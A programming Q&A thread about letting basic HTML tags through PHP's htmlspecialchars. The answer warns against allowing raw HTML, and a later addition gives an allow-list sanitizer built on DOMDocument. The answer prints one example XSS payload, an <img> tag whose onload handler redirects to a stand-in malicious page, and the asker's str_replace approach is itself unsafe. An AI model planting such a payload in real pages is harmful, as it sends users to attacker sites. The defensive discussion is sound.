dsgw8802 2017-04-14 15:40
Views: 73
Accepted

htmlentities allows <a> links - how?

In order to make my inputs safe, I'm using htmlentities in php:

$input = $_POST['field'];
$result = htmlspecialchars($input);

This works, but then I realized that in some inputs, I need to allow some basic markup like <b> and <i>, copyright logos and basic stuff for the user. So I started doing this:

$result = $_POST['ftext'];
$presanitize = htmlspecialchars($result);
$newftext = str_replace(
    array("&lt;i&gt;", "&lt;b&gt;", "&lt;/i&gt;", "&lt;/b&gt;", "&copy;", "&quot;", "&lt;a&gt;", "&lt;&#47;a&gt;"),
    array("<i>", "<b>", "</i>", "</b>", "©", '"', "<a>", "</a>"),
    $presanitize
);

Now we come to my main problem: how to allow things like <a> and <img> where we don't have only a tag and don't know what comes inside of it?

I can replace , because it's always only , but if I replace , it won't work as I'll have lots of stuff (<a href="http://link.com">Text</a>) inside of it. What should I do? Thanks in advance.


2 answers

  • dsft8327 2017-04-14 15:52

    The simple answer is: You don't. That's part of the reason why many popular forum systems use some kind of markup that's not just plain HTML. Otherwise people can and will do nasty stuff some way or another.

    <img src="http://example.com/random-pic.jpg" onload="location.href='http://some.nasty.page/exploit';"/>

    But you can remove event tags? Of course, but will you keep up to date with everything browsers support and their quirks? Can you really outsmart everyone?

    If you still want to do it, look for a well documented, tested, and used library or script that provides this functionality. PHP essentially has this built in, but it's really barebone. Some keywords to look for would be "php html sanitizer" or similar.

    Personally I'd recommend you just support Markdown or BBCode like syntax (again: there are many ready to use snippets and libraries available). Don't reinvent the wheel unless you really have to.

    Accepted answer (selected by the asker)
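The allow-list approach the answer points to (parse the input, keep only known tags and attributes, discard everything else), as an added example that is not part of the question or the answer: a small sanitizer built on PHP's built-in DOMDocument. Everything about it is my assumption, not the answer's code: the tag list (`b`, `i`, `a`), the `sanitizeHtml` and `sanitizeNode` names, and the rule that an `href` is kept only when it starts with `http://` or `https://`. It deliberately leaves `<img>` off the list, in line with the answer's advice. The sample input is constructed from the answer's own `<img onload>` tag plus an ordinary link.

```php
<?php
// Added example (assumption, not code from the question or the answer):
// an allow-list sanitizer on DOMDocument. Only <b>, <i> and <a href> survive;
// every other element is flattened to its text and every other attribute
// (including all on* event handlers) is dropped.

const ALLOWED_TAGS = [
    'b' => [],
    'i' => [],
    'a' => ['href'],
];

function sanitizeHtml(string $input): string
{
    $doc = new DOMDocument();
    // The leading <?xml encoding> hint stops libxml from guessing the charset;
    // internal error handling silences warnings about unbalanced user markup.
    libxml_use_internal_errors(true);
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $input . '</body>');
    libxml_clear_errors();

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    sanitizeNode($body);

    // Serialize the cleaned children of <body> only, without the wrapper.
    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function sanitizeNode(DOMNode $node): void
{
    // Work on a static copy: the live childNodes list changes while we edit it.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!isset(ALLOWED_TAGS[$tag])) {
                // Not on the list: replace the element with its plain text
                // (an <img> has no text, so it disappears entirely).
                $text = $child->ownerDocument->createTextNode($child->textContent);
                $node->replaceChild($text, $child);
                continue;
            }
            // Drop every attribute that is not allowed for this tag.
            foreach (iterator_to_array($child->attributes, false) as $attr) {
                if (!in_array(strtolower($attr->name), ALLOWED_TAGS[$tag], true)) {
                    $child->removeAttribute($attr->name);
                }
            }
            // For links, keep href only when it is a plain http(s) URL.
            if ($tag === 'a' && $child->hasAttribute('href')) {
                $href = trim($child->getAttribute('href'));
                if (!preg_match('#^https?://#i', $href)) {
                    $child->removeAttribute('href');
                }
            }
            sanitizeNode($child);
        } elseif (!($child instanceof DOMText)) {
            // Comments and processing instructions carry no user content: drop them.
            $node->removeChild($child);
        }
    }
}

// Constructed sample input: the answer's <img onload> tag, the asker's
// copyright entity, and two links (one carrying an attribute that is not allowed).
$sample = 'Hello <b>world</b> &copy; 2017 <a href="http://example.com/">link</a> '
    . '<img src="http://example.com/random-pic.jpg" onload="location.href=\'http://some.nasty.page/exploit\';"/>'
    . ' <a href="http://example.com/" title="x">another</a>';

echo sanitizeHtml($sample), PHP_EOL;
```

Entities such as `&copy;` are decoded by the parser and re-serialized on output, so the `str_replace` pass from the question is not needed. Any element not on the list is flattened to its text, which also removes allowed tags nested inside it; that is a conservative choice rather than a limitation of the technique. For anything beyond this three-tag list, the maintained sanitizer library the answer suggests is the better choice, because it tracks the browser quirks the answer warns about.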
